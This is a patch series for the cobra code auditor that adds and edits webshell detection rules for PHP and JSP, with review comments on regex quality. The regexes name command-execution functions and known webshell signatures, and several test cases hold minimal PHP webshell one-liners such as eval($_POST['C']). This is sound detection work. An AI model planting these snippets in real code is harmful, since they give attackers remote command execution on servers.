diff --git a/rules/CVI-360051.xml b/rules/CVI-360051.xml index e69de29b..b7bbdca2 100644 --- a/rules/CVI-360051.xml +++ b/rules/CVI-360051.xml @@ -0,0 +1,21 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="sql_query"/> + <language value="jsp"/> + <match mode="regex-only-match"><![CDATA[ + (ResultSet)?\s*\w+\s*=\s*\w+\.executeQuery\(.*?\) + ]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360052.xml b/rules/CVI-360052.xml index e69de29b..9f41b62b 100644 --- a/rules/CVI-360052.xml +++ b/rules/CVI-360052.xml 
@@ -0,0 +1,21 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="jdbc_drivers"/> + <language value="jsp"/> + <match mode="regex-only-match"><![CDATA[ + COM\.ibm\.db2\.jdbc\.app\.DB2Driver|COM\.ibm\.db2\.jdbc\.DB2XADataSource|COM\.ibm\.db2\.jdbc\.net\.DB2Driver|com\.informix\.jdbc\.IfxDriver|com\.informix\.jdbcx\.IfxXADataSource|org\.apache\.derby\.jdbc\.ClientDriver|com\.microsoft\.sqlserver\.jdbc\.SQLServerDriver|com\.microsoft\.jdbc\.sqlserver\.SQLServerDriver|com\.mysql\.jdbc\.Driver|org\.gjt\.mm\.mysql\.Driver|oracle\.jdbc\.driver\.OracleDriver|oracle\.jdbc\.xa\.client\.OracleXADataSource|oracle\.jdbc\.driver\.OracleDriver|oracle\.jdbc\.xa\.client\.OracleXADataSource|com\.tongweb\.jdbc\.OracleDriverWrapper|org\.postgresql\.Driver|com\.sybase\.jdbc\.SybDriver|com\.sybase\.jdbc2\.jdbc\.SybXADataSource|org\.hsqldb\.jdbcDriver|com\.sybase\.jdbc3\.jdbc\.SybDriver|com\.kingbase\.Driver|dm\.jdbc\.driver\.DmDriver + ]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file From 2b56cae358136daa6008fa307ecbe114c2061132 Mon Sep 17 00:00:00 2001 
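Review bot: The alternation lists `oracle\.jdbc\.driver\.OracleDriver` and `oracle\.jdbc\.xa\.client\.OracleXADataSource` twice each; the duplicates do not change the match but show the list was pasted rather than reviewed, so deduplicate it. More importantly, a JDBC driver class name appears in every JSP that opens a database connection, and this rule scores it as a level-7 webshell whose fix is to delete the file — a capability indicator at best, and one that overlaps CVI-360050 (`DriverManager.getConnection`) added in the same series. Lower the level or fold it into the SQL rules with a tainted-input condition, and replace the empty `<case assert="true">` with a real sample.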
From: braveghz <braveghz@gmail.com> Date: Wed, 6 Sep 2017 11:11:42 +0800 Subject: [PATCH 14/29] =?UTF-8?q?=E6=9C=A8=E9=A9=AC=E7=89=B9=E5=BE=81?= =?UTF-8?q?=E6=89=AB=E6=8F=8F?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- rules/CVI-360001.xml | 21 -------- rules/CVI-360002.xml | 24 --------- rules/CVI-360003.xml | 21 -------- rules/CVI-360004.xml | 24 --------- rules/CVI-360005.xml | 20 ------- rules/CVI-360006.xml | 21 -------- rules/CVI-360007.xml | 21 -------- rules/CVI-360008.xml | 22 -------- rules/CVI-360009.xml | 25 --------- rules/CVI-360011.xml | 21 -------- rules/CVI-360012.xml | 21 -------- rules/CVI-360028.xml | 19 +++++++ rules/CVI-360029.xml | 16 ++++++ rules/CVI-360030.xml | 16 ++++++ rules/CVI-360031.xml | 16 ++++++ rules/CVI-360032.xml | 8 +-- rules/CVI-360033.xml | 8 +-- tests/vulnerabilities/webshell.php | 83 +++++++++++++++++++----------- 18 files changed, 125 insertions(+), 282 deletions(-) delete mode 100644 rules/CVI-360001.xml delete mode 100644 rules/CVI-360002.xml delete mode 100644 rules/CVI-360003.xml delete mode 100644 rules/CVI-360004.xml delete mode 100644 rules/CVI-360005.xml delete mode 100644 rules/CVI-360006.xml delete mode 100644 rules/CVI-360007.xml delete mode 100644 rules/CVI-360008.xml delete mode 100644 rules/CVI-360009.xml delete mode 100644 rules/CVI-360011.xml delete mode 100644 rules/CVI-360012.xml create mode 100644 rules/CVI-360028.xml create mode 100644 rules/CVI-360029.xml create mode 100644 rules/CVI-360030.xml create mode 100644 rules/CVI-360031.xml diff --git a/rules/CVI-360001.xml b/rules/CVI-360001.xml deleted file mode 100644 index 0fb57ad6..00000000 --- a/rules/CVI-360001.xml +++ /dev/null 
@@ -1,21 +0,0 @@ -<?xml version="1.0" encoding="UTF-8"?> -<cobra document="https://github.com/wufeifei/cobra"> - <name value="webshell1"/> - <language value="php"/> - <match mode="regex-only-match"><![CDATA[ - \b(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\b[/*\s]*\(+[/*\s]*((\$_(GET|POST|REQUEST|COOKIE).{0,25})|(base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(]*(\$_(GET|POST|REQUEST|COOKIE).{0,25})) - ]]></match> - <level value="7"/> - <test> - <case assert="true"><![CDATA[eval($_POST['C']);]]></case> - </test> - <solution> - ## 安全风险 - 代码中存在webshell - - ## 修复方案 - 删除 - </solution> - <status value="on"/> - <author name="Feei" email="feei@feei.cn"/> -</cobra> \ No newline at end of file diff --git a/rules/CVI-360002.xml b/rules/CVI-360002.xml deleted file mode 100644 index 430020dd..00000000 --- a/rules/CVI-360002.xml +++ /dev/null @@ -1,24 +0,0 @@ -<?xml version="1.0" encoding="UTF-8"?> -<cobra document="https://github.com/wufeifei/cobra"> - <name value="webshell2"/> - <language value="php"/> - <match mode="regex-only-match"><![CDATA[ - \s*\b(include|require)(_once)?\b[\s\(]*['\"][^\n'\"]{1,100}((\.(jpg|png|txt|jpeg|log|tmp|db|cache)|\_(tmp|log))|((http|https|file|php|data|ftp)\://.{0,25}))['\"][\s\)]*[\r\n;/\*]+ - ]]></match> - <level value="7"/> - <test> - <case assert="true"><![CDATA[ - $a="ss"; - include("sss.jpg"); - ]]></case> - </test> - <solution> - ## 安全风险 - 代码中存在webshell - - ## 修复方案 - 删除 - </solution> - <status value="on"/> - <author name="Feei" email="feei@feei.cn"/> -</cobra> \ No newline at end of file diff --git a/rules/CVI-360003.xml b/rules/CVI-360003.xml deleted file mode 100644 index 584f833b..00000000 --- a/rules/CVI-360003.xml +++ /dev/null 
@@ -1,21 +0,0 @@ -<?xml version="1.0" encoding="UTF-8"?> -<cobra document="https://github.com/wufeifei/cobra"> - <name value="webshell3"/> - <language value="php"/> - <match mode="regex-only-match"><![CDATA[ - \$\s*(\w+)\s*=[\s\(\{]*(\$_(GET|POST|REQUEST|COOKIE).{0,25});[\s\S]{0,200}\b(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\b[/*\s]*\(+[\s\"/*]*(\$\s*\1|((base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(\"]*\$\s*\1)) - ]]></match> - <level value="7"/> - <test> - <case assert="true"><![CDATA[echo '###m7lrvok###';$a=$_POST['m7lrv'];$b;$b=$a;@eval($a)]]></case> - </test> - <solution> - ## 安全风险 - 代码中存在webshell - - ## 修复方案 - 删除 - </solution> - <status value="on"/> - <author name="Feei" email="feei@feei.cn"/> -</cobra> \ No newline at end of file diff --git a/rules/CVI-360004.xml b/rules/CVI-360004.xml deleted file mode 100644 index f48a0676..00000000 --- a/rules/CVI-360004.xml +++ /dev/null @@ -1,24 +0,0 @@ -<?xml version="1.0" encoding="UTF-8"?> -<cobra document="https://github.com/wufeifei/cobra"> - <name value="webshell4"/> - <language value="php"/> - <match mode="regex-only-match"><![CDATA[ - (preg_replace|preg_filter)[/*\s]*\(+[/*\s]*((\$_(GET|POST|REQUEST|COOKIE).{0,25})|[^,]{0,250}chr[\s\(](101|0x65|0145|\d+)[^,]{0,25}\s*|['\"]\s*(([^\s])[^,]{0,20}\7['\"]*|[\(\}\[].{0,20}[\(\}\]])\w*e\w*['\"])\s*,\s*([^\),]*(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)|((\$_(GET|POST|REQUEST|COOKIE).{0,25}))) - ]]></match> - <level value="7"/> - <test> - <case assert="true"><![CDATA[ - $string = 'AABBCCDDEE'; - preg_replace($_POST['A'], $_POST['B'], $string); - ]]></case> - </test> - <solution> - ## 安全风险 - 代码中存在webshell - - ## 修复方案 - 删除 - </solution> - <status value="on"/> - <author name="Feei" email="feei@feei.cn"/> -</cobra> \ No newline at end of file diff --git a/rules/CVI-360005.xml b/rules/CVI-360005.xml deleted file mode 100644 index 86cfbbe3..00000000 --- a/rules/CVI-360005.xml +++ /dev/null 
@@ -1,20 +0,0 @@ -<?xml version="1.0" encoding="UTF-8"?> -<cobra document="https://github.com/wufeifei/cobra"> - <name value="webshell5"/> - <language value="php"/> - <match mode="regex-only-match"><![CDATA[ - \$\s*(\w+)\s*=\s*((\$_(GET|POST|REQUEST|COOKIE).{0,25})|[^;]*chr[\s\(]*(101|0x65|0145|\\d+)|['\"](/[^/]*/|\|[^\|]*\||\'[^']*')\w{0,5}e\w{0,5}['\"])[\s\S]{0,1000}(preg_replace|preg_filter)[/*\s]*\([/*\s]*\$\s*\1.{0,30}(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec) - ]]></match> - <level value="7"/> - <test> - </test> - <solution> - ## 安全风险 - 代码中存在webshell - - ## 修复方案 - 删除 - </solution> - <status value="on"/> - <author name="Feei" email="feei@feei.cn"/> -</cobra> \ No newline at end of file diff --git a/rules/CVI-360006.xml b/rules/CVI-360006.xml deleted file mode 100644 index ada5df48..00000000 --- a/rules/CVI-360006.xml +++ /dev/null @@ -1,21 +0,0 @@ -<?xml version="1.0" encoding="UTF-8"?> -<cobra document="https://github.com/wufeifei/cobra"> - <name value="webshell6"/> - <language value="php"/> - <match mode="regex-only-match"><![CDATA[ - \$\s*(\w+)\s*=\s*(\$_(GET|POST|REQUEST|COOKIE).{0,25})[\s\S]{0,1000}(preg_replace|preg_filter)[/*\s]*\(+[/*\s]*((\$_(GET|POST|REQUEST|COOKIE).{0,25})|[^,]{0,250}chr[\s\(](101|0x65|0145|\d+)[^,]{0,25}\s*|['\"]\s*(([^\s])[^,]{0,20}\10|[\(\}\[].{0,20}[\(\}\]])\w*e\w*['\"])\s*,([^\)]*(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)|\s*\$\1) - ]]></match> - <level value="7"/> - <test> - <case assert="true"><![CDATA[$b = $_POST['B']; preg_replace($_POST['A'], $b, $string);]]></case> - </test> - <solution> - ## 安全风险 - 代码中存在webshell - - ## 修复方案 - 删除 - </solution> - <status value="on"/> - <author name="Feei" email="feei@feei.cn"/> -</cobra> \ No newline at end of file diff --git a/rules/CVI-360007.xml b/rules/CVI-360007.xml deleted file mode 100644 index 6dcdd6e4..00000000 --- a/rules/CVI-360007.xml +++ /dev/null 
@@ -1,21 +0,0 @@ -<?xml version="1.0" encoding="UTF-8"?> -<cobra document="https://github.com/wufeifei/cobra"> - <name value="webshell7"/> - <language value="php"/> - <match mode="regex-only-match"><![CDATA[ - (array_map|call_user_func|call_user_func_array|new\s*ReflectionFunction|register_shutdown_function|register_tick_function|new\s*ArrayObject[\s\S]*->u[ak]sort)\s*\(+\s*(['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|[^'\"]*\\x).{0,200}|(\$_(GET|POST|REQUEST|COOKIE)\[[^,;\)]{0,250},[^;\),]{0,50}\$[^;\),]{0,50}\))) - ]]></match> - <level value="7"/> - <test> - <case assert="true"><![CDATA[array_map("ass\x65rt",(array)$_REQUEST['expdoor']);]]></case> - </test> - <solution> - ## 安全风险 - 代码中存在webshell - - ## 修复方案 - 删除 - </solution> - <status value="on"/> - <author name="Feei" email="feei@feei.cn"/> -</cobra> \ No newline at end of file diff --git a/rules/CVI-360008.xml b/rules/CVI-360008.xml deleted file mode 100644 index a99ddcad..00000000 --- a/rules/CVI-360008.xml +++ /dev/null @@ -1,22 +0,0 @@ -<?xml version="1.0" encoding="UTF-8"?> -<cobra document="https://github.com/wufeifei/cobra"> - <name value="webshell8"/> - <language value="php"/> - <match mode="regex-only-match"><![CDATA[ - \$\s*(\w+)\s*=[\s\(\{]*((\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})|['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec))[\s\S]{0,200}\b(array_map|call_user_func|call_user_func_array|new\s*ReflectionFunction|register_shutdown_function|register_tick_function|new\s*ArrayObject[\s\S]*->u[ak]sort)\b\s*\(+\s*(\$\s*\1|((base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(]*\$\s*\1))[^,;]*,[^;\)]{0,50}\$[^;\)]{0,50}\) - ]]></match> - <level value="7"/> - <test> - <case assert="true"><![CDATA[ - ]]></case> - </test> - <solution> - ## 安全风险 - 代码中存在webshell - - ## 修复方案 - 删除 - </solution> - <status value="on"/> - <author name="Feei" email="feei@feei.cn"/> -</cobra> \ No newline at end of file 
diff --git a/rules/CVI-360009.xml b/rules/CVI-360009.xml deleted file mode 100644 index 7353d189..00000000 --- a/rules/CVI-360009.xml +++ /dev/null @@ -1,25 +0,0 @@ -<?xml version="1.0" encoding="UTF-8"?> -<cobra document="https://github.com/wufeifei/cobra"> - <name value="webshell9"/> - <language value="php"/> - <match mode="regex-only-match"><![CDATA[ - ((array_filter|array_reduce|array_diff_ukey|array_udiff|array_walk|uasort|uksort|usort|new\s*SQLite3[\s\S]*->\s*createFunction)\s*\(+\s*.{1,100}|PDO::FETCH_FUNC\s*),\s*(['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\s*['\"]|(base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(]+.{1,25}|(\$_(GET|POST|REQUEST|COOKIE).{0,25}))\s*\) - ]]></match> - <level value="7"/> - <test> - <case assert="true"><![CDATA[ - $e = $_REQUEST['e']; - $arr = array($_POST['pass'],); - array_filter($arr, base64_decode($e)); - ]]></case> - </test> - <solution> - ## 安全风险 - 代码中存在webshell - - ## 修复方案 - 删除 - </solution> - <status value="on"/> - <author name="Feei" email="feei@feei.cn"/> -</cobra> \ No newline at end of file diff --git a/rules/CVI-360011.xml b/rules/CVI-360011.xml deleted file mode 100644 index fd146e44..00000000 --- a/rules/CVI-360011.xml +++ /dev/null 
@@ -1,21 +0,0 @@ -<?xml version="1.0" encoding="UTF-8"?> -<cobra document="https://github.com/wufeifei/cobra"> - <name value="webshell11"/> - <language value="php"/> - <match mode="regex-only-match"><![CDATA[ - \$(\w*)\s*=\s*\bcreate_function(\b\s)*\(+\s*[^;\n\r\)]{1,100},\s*(['\"]\s*[^;\n\r\)]{0,100}(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|poc_open|pcntl_exec).{1,600}\s*['\"]|[^,]{0,100}(\$_(GET|POST|REQUEST|COOKIE|SERVER).{1,})|[^,\n\r\)]{0,100}file_get_contents.{1,})\s*\)[\s\S]+\$\1\s*\([^\)]*\) - ]]></match> - <level value="7"/> - <test> - <case assert="true"><![CDATA[$newfunc = create_function(null,'assert($_POST[c]);');$newfunc();]]></case> - </test> - <solution> - ## 安全风险 - 代码中存在webshell - - ## 修复方案 - 删除 - </solution> - <status value="on"/> - <author name="Feei" email="feei@feei.cn"/> -</cobra> \ No newline at end of file diff --git a/rules/CVI-360012.xml b/rules/CVI-360012.xml deleted file mode 100644 index 2ec1505f..00000000 --- a/rules/CVI-360012.xml +++ /dev/null @@ -1,21 +0,0 @@ -<?xml version="1.0" encoding="UTF-8"?> -<cobra document="https://github.com/wufeifei/cobra"> - <name value="webshell12"/> - <language value="php"/> - <match mode="regex-only-match"><![CDATA[ - \$(\w*)\s*=\s*\bcreate_function\b\s*\([^;]*;(\n)*[\s\S]*\$\1\s*\([^\)]*(['\"]\s*[^;\n\r\)]{0,100}(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|poc_open|pcntl_exec).{1,600}\s*['\"]|[^;\n\r]{0,100}(\$_(GET|POST|REQUEST|COOKIE|SERVER).{1,})|[^;\n\r\)]{0,100}file_get_contents.{1,}) - ]]></match> - <level value="7"/> - <test> - <case assert="true"><![CDATA[$newfunc = create_function('str','return str');$newfunc("$_POST['c']");]]></case> - </test> - <solution> - ## 安全风险 - 代码中存在webshell - - ## 修复方案 - 删除 - </solution> - <status value="on"/> - <author name="Feei" email="feei@feei.cn"/> -</cobra> \ No newline at end of file diff --git a/rules/CVI-360028.xml b/rules/CVI-360028.xml new file mode 100644 index 00000000..ee59faee --- /dev/null 
+++ b/rules/CVI-360028.xml
@@ -0,0 +1,19 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<cobra document="https://github.com/wufeifei/cobra">
+ <name value="webshell28"/>
+ <language value="php"/>
+ <match mode="regex-only-match"><![CDATA[eval\(\"\?>\"\.|gzinflate\(base64_decode\(|eval\(base64_decode\(|cat\s*/etc/passwd|Safe_Mode\s*Bypass]]></match>
+ <level value="7"/>
+ <test>
+ <case assert="true"><![CDATA[eval(base64_decode(ZXZhbChiYXNlNjRfZGVjb2RlKFpYWmhiQ2hpWVhObE5qUmZaR1ZqYjJSbEtFeDVPRGhRTTBKdlkwRndiR1J0Um5OTFExSm1WVVU1VkZaR2RHdGlNamw1V0ZOclMweDVPQzVqYUhJb05EY3BMbEJuS1NrNykpOw));]]></case>
+ </test>
+ <solution>
+ ## 安全风险
+ 代码中存在webshell
+
+ ## 修复方案
+ 删除
+ </solution>
+ <status value="on"/>
+ <author name="Feei" email="feei@feei.cn"/>
+</cobra>
\ No newline at end of file
diff --git a/rules/CVI-360029.xml b/rules/CVI-360029.xml
new file mode 100644
index 00000000..265c9dbc
--- /dev/null
+++ b/rules/CVI-360029.xml
@@ -0,0 +1,16 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<cobra document="https://github.com/wufeifei/cobra">
+ <name value="webshell29"/>
+ <language value="php"/>
+ <match mode="regex-only-match"><![CDATA[\$_\[\$_|\${\"_P\"\.|a(.)s\1s\1e\1r\1t|'e'\.'v'\.'a'\.'l|687474703a2f2f626c616b696e2e64756170702e636f6d2f7631|python_eval\(\"import os\\nos.system\(|\$bind_pl\s*=\s*\"IyEvdXNyL2Jpbi9lbnYgcGV|phpsocks5_encrypt\s*\(|eNrs/Vmv41iWJgq+ZwH1H7wdAWRksypJihRF3kQ0mvMsihTnuoUA53meeVG/valj5mbuHpF9b6P7se]]></match>
+ <level value="7"/>
+ <solution>
+ ## 安全风险
+ 代码中存在webshell
+
+ ## 修复方案
+ 删除
+ </solution>
+ <status value="on"/>
+ <author name="Feei" email="feei@feei.cn"/>
+</cobra>
\ No newline at end of file
diff --git a/rules/CVI-360030.xml b/rules/CVI-360030.xml
new file mode 100644
index 00000000..2ac9f909
--- /dev/null
+++ b/rules/CVI-360030.xml
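Review bot: Only the `eval\(base64_decode\(` alternative is exercised by the `<case>`; the other four branches (`eval\(\"\?>\"\.`, `gzinflate\(base64_decode\(`, `cat\s*/etc/passwd`, `Safe_Mode\s*Bypass`) have no case, so a later edit to the pattern can silently break them. The last two are plain strings that also match inside comments or documentation text in a scanned tree, so a short negative sample (if the `<case>` format supports `assert="false"`) would pin the intended scope. One `<case assert="true">` per alternative, each holding the literal that branch expects, is enough.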
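Review bot: This rule has no `` with one case per alternative (placeholder shown; take each literal from the pattern itself).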
@@ -0,0 +1,16 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<cobra document="https://github.com/wufeifei/cobra">
+ <name value="webshell30"/>
+ <language value="php"/>
+ <match mode="regex-only-match"><![CDATA[preg_replace\s*\(\s*['\"][^;]*e[^;]*['\"],([^;]{0,30}\x|[^;\)]{200,300})|\$back_connect=\"IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU2|define\('gzip',function_exists\(\"ob_gzhandler\"\)|chr\(112\)\.chr\(97\)\.chr\(115\)\.chr\(115\)|687474703a2f2f377368656c]]></match>
+ <level value="7"/>
+ <solution>
+ ## 安全风险
+ 代码中存在webshell
+
+ ## 修复方案
+ 删除
+ </solution>
+ <status value="on"/>
+ <author name="Feei" email="feei@feei.cn"/>
+</cobra>
\ No newline at end of file
diff --git a/rules/CVI-360031.xml b/rules/CVI-360031.xml
new file mode 100644
index 00000000..2b43470f
--- /dev/null
+++ b/rules/CVI-360031.xml
@@ -0,0 +1,16 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<cobra document="https://github.com/wufeifei/cobra">
+ <name value="webshell31"/>
+ <language value="php"/>
+ <match mode="regex-only-match"><![CDATA[ini_get\s*\(\s*\"disable_functions\"\s*\)|\d\s*=>\s*array\s*\(\s*['\"]\s*pipe\s*['\"]|gzuncompress\(base64_decode\(|crypt\(\$_SERVER\['HTTP_H0ST'\],\d+\)==|if\(file_exists\(\$settings\['STOPFILE'\]\)\)]]></match>
+ <level value="7"/>
+ <solution>
+ ## 安全风险
+ 代码中存在webshell
+
+ ## 修复方案
+ 删除
+ </solution>
+ <status value="on"/>
+ <author name="Feei" email="feei@feei.cn"/>
+</cobra>
\ No newline at end of file
diff --git a/rules/CVI-360032.xml b/rules/CVI-360032.xml
index 4b4ecbd0..5a32e9df 100644
--- a/rules/CVI-360032.xml
+++ b/rules/CVI-360032.xml
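Review bot: `[^;]{0,30}\x|` leaves `\x` with no hex digits; in Python's `re` that is an incomplete escape and the whole pattern fails to compile, taking every other alternative in this rule down with it (I assume the engine is Python `re` since the rest of cobra is Python; PCRE would read it as a NUL byte, which does not look intended either). If a literal backslash-x sequence is meant, write it the way CVI-360026 does with `ass\\x65rt`, i.e. `[^;]{0,30}\\x`. A `<test>` case for this branch would have caught the compile failure.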
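Review bot: `ini_get\s*\(\s*\"disable_functions\"\s*\)` is an ordinary capability check that installers and frameworks make, so on its own it is weak evidence and will raise level-7 findings on legitimate code, while the other four alternatives are far more specific. Consider dropping that branch or requiring a second indicator alongside it, and add a `<test>` with one positive case per remaining branch so the pattern is pinned.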
@@ -1,13 +1,9 @@ <?xml version="1.0" encoding="UTF-8"?> <cobra document="https://github.com/wufeifei/cobra"> - <name value="webshell12"/> + <name value="webshell"/> <language value="php"/> - <match mode="regex-only-match"><![CDATA[ - \$nofuncs='no\s*exec\s*functions|udf\.dll|\$b374k|POWER-BY\s*WWW.XXDDOS.COM|<title>Safes\s*Mode\s*Shell|Siyanur\.PHP\s*|c999shexit\(\)|\$c99sh_|c99_sess_put\(|Coded\s*by\s*cyb3r|cyb3r_getupdate\(|coded\s*by\s*tjomi4|john\.barker446@gmail\.com|eval\(\"\\\$x=gzin\"|eval\(\"\?>\"\.gzinflate\(base64_decode\(|eval\(gzinflate\(base64_decode\(|eval\(gzuncompress\(base64_decode\(|eval\(gzinflate\(str_rot13\(base64_decode\(|function_exists\(\"zigetwar_buff_prepare\"\)|dQ99shell|r57shell|c99shell|lama's'hell\s*v|Carbylamine\s*PHP\s*Encoder|Safe\s*Mode\s*Shell|\$dI3h=\${'_REQUEST'};|new\s*COM\(\"IIS://localhost/w3svc\"\)|n57http-based\[\s*-\]terminal|Dosya\s*Olu|errorlog\(\"BACKEND:\s*startReDuh,|form\s*name=sh311Form|PHPJackal
|Reddragonfly's\s*WebShell|\(\"system\"==\$seletefunc\)\?system\(\$shellcmd\)|eNrsvGmT40iSKPZ5xmz|CrystalShell\s*v\.|Special\s*99\s*Shell|Simple\s*PHP\s*Mysql\s*client|'_de'\.'code'|phpsocks5_encrypt\(|define\('PHPSHELL_VERSION',|ZXZhbCgkX1BPU1RbMV0p|\$__H_H\(\$__C_C" - ]]>
+ Safes\s*Mode\s*Shell|Siyanur\.PHP\s*|c999shexit\(\)|\$c99sh_|c99_sess_put\(|Coded\s*by\s*cyb3r|cyb3r_getupdate\(|coded\s*by\s*tjomi4|john\.barker446@gmail\.com|eval\(\"\\\$x=gzin\"|eval\(\"\?>\"\.gzinflate\(base64_decode\(|eval\(gzinflate\(base64_decode\(|eval\(gzuncompress\(base64_decode\(|eval\(gzinflate\(str_rot13\(base64_decode\(|function_exists\(\"zigetwar_buff_prepare\"\)|dQ99shell|r57shell|c99shell|lama's'hell\s*v|Carbylamine\s*PHP\s*Encoder|Safe\s*Mode\s*Shell|\$dI3h=\${'_REQUEST'};|new\s*COM\(\"IIS://localhost/w3svc\"\)|n57http-based\[\s*-\]terminal|Dosya\s*Olu|errorlog\(\"BACKEND:\s*startReDuh,|form\s*name=sh311Form|PHPJackal
|Reddragonfly's\s*WebShell|\(\"system\"==\$seletefunc\)\?system\(\$shellcmd\)|eNrsvGmT40iSKPZ5xmz|CrystalShell\s*v\.|Special\s*99\s*Shell|Simple\s*PHP\s*Mysql\s*client|'_de'\.'code'|phpsocks5_encrypt\(|define\('PHPSHELL_VERSION',|ZXZhbCgkX1BPU1RbMV0p|\$__H_H\(\$__C_C"]]>
- - ## 安全风险 代码中存在webshell diff --git a/rules/CVI-360033.xml b/rules/CVI-360033.xml index bb815d31..9f77cf83 100644 --- a/rules/CVI-360033.xml +++ b/rules/CVI-360033.xml @@ -1,13 +1,9 @@ - + - |define\('envlpass',|KingDefacer_getupdate\(|relative2absolute\(|Host:\s*old.zone-h.org|
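Review bot: `<name value="webshell"/>` breaks the naming used by every sibling rule (webshell22, webshell23, webshell26, webshell28 to webshell31, webshell34) and is the only rule whose name no longer encodes its id; `<name value="webshell32"/>` keeps lookup-by-name consistent. The two lone `-` lines before `## 安全风险` look like the rule's `<test>` element being removed (the tags were lost in rendering, so this is inferred), which leaves this long alternation with nothing that pins it; keep a `<test>` with at least one `<case assert="true">`. The `<cobra>` element starts and ends outside this hunk.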

PHPKonsole

|\$_SESSION\['hassubdirs'\]\[\$treeroot\]|strtolower\(\$cmd\)\s*==\s*\"canirun\"|\$shell\s*=\s*'uname\s*-a;\s*w;\s*id;|Avrasya\s*Veri\s*ve\s*NetWork|

Linux Shells

|\$MyShellVersion\s*=\s*\"MyShell|PHP\s*Shell\s*[^\n\r]*|\$OOO000000=urldecode|1MSSYowqjzlVVAwAoHHFXzQ5Lc|'xiaoqiwangluo'|EqQC1FhyXxpEi7l2g\+yNjW62S|\$_uU\(83\)\.\$_uU\(84\)|7kyJ7kSKioDTWVWeRB3TiciL1UjcmRiLn4SKiAETs90cuZlTz5mROtHWHdWfRt0ZupmVRNTU2Y2MVZkT8|\s*ARS\s*Terminator\s*Shell|base64_decode\(\"R0lGODdhEgASAKEAAO7u7gAAAJmZmQAAACwAAA|\\x50\\x4b\\x03\\x04\\x0a\\x00\\x00\\x00\\x00|'W3D\s*Shell|\$back_connect=\"IyEvdXNyL2Jpbi9wZXJsD - ]]></match> + <match mode="regex-only-match"><![CDATA[PD9waHANCiRzX3ZlciA9ICIxLjAiOw0KJHNfdGl0bGUgPSAiWG5vbnltb3V4IFNoZWxsIC|GFnyF4lgiGXW2N7BNyL5EEyQA42LdZtao2S9f|IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7|setcookie\(\"N3tsh_surl\"\);|function\s*Tihuan_Auto|\$_COOKIE\['b374k'\]|function_exists\(\"k1r4_sess_put\"\)|http://www.7jyewu.cn/|scookie\('phpspypass|PHVayv.php\?duzkaydet=|phpRemoteView</a>|define\('envlpass',|KingDefacer_getupdate\(|relative2absolute\(|Host:\s*old.zone-h.org|<h3>PHPKonsole</h3>|\$_SESSION\['hassubdirs'\]\[\$treeroot\]|strtolower\(\$cmd\)\s*==\s*\"canirun\"|\$shell\s*=\s*'uname\s*-a;\s*w;\s*id;|Avrasya\s*Veri\s*ve\s*NetWork|<h1>Linux Shells</h1>|\$MyShellVersion\s*=\s*\"MyShell|<a\s*href=\"http://ihacklog.com/\"|setcookie\(\s*\"mysql_web_admin_username\"\s*\)|<title>PHP\s*Shell\s*[^\n\r]*|\$OOO000000=urldecode|1MSSYowqjzlVVAwAoHHFXzQ5Lc|'xiaoqiwangluo'|EqQC1FhyXxpEi7l2g\+yNjW62S|\$_uU\(83\)\.\$_uU\(84\)|7kyJ7kSKioDTWVWeRB3TiciL1UjcmRiLn4SKiAETs90cuZlTz5mROtHWHdWfRt0ZupmVRNTU2Y2MVZkT8|\s*ARS\s*Terminator\s*Shell|base64_decode\(\"R0lGODdhEgASAKEAAO7u7gAAAJmZmQAAACwAAA|\\x50\\x4b\\x03\\x04\\x0a\\x00\\x00\\x00\\x00|'W3D\s*Shell|\$back_connect=\"IyEvdXNyL2Jpbi9wZXJsD]]></match> <level value="7"/> - <test> - </test> <solution> ## 安全风险 代码中存在webshell diff --git a/tests/vulnerabilities/webshell.php b/tests/vulnerabilities/webshell.php index 45693505..c0466aeb 100644 --- a/tests/vulnerabilities/webshell.php +++ b/tests/vulnerabilities/webshell.php 
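Review bot: Dots are escaped inconsistently in the new pattern: `www.7jyewu.cn`, `old.zone-h.org`, `ihacklog.com` and `PHVayv.php` use a bare `.` while the sibling rule escapes it (`john\.barker446@gmail\.com`, `Siyanur\.PHP`), so those four branches are slightly wider than intended; write `www\.7jyewu\.cn`, `old\.zone-h\.org`, `ihacklog\.com`, `PHVayv\.php`. The hunk also removes the empty `<test>` element rather than filling it; a pattern of this size should keep a `<test>` with one `<case assert="true">` per branch you rely on. The `<cobra>` element starts and ends outside this hunk.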
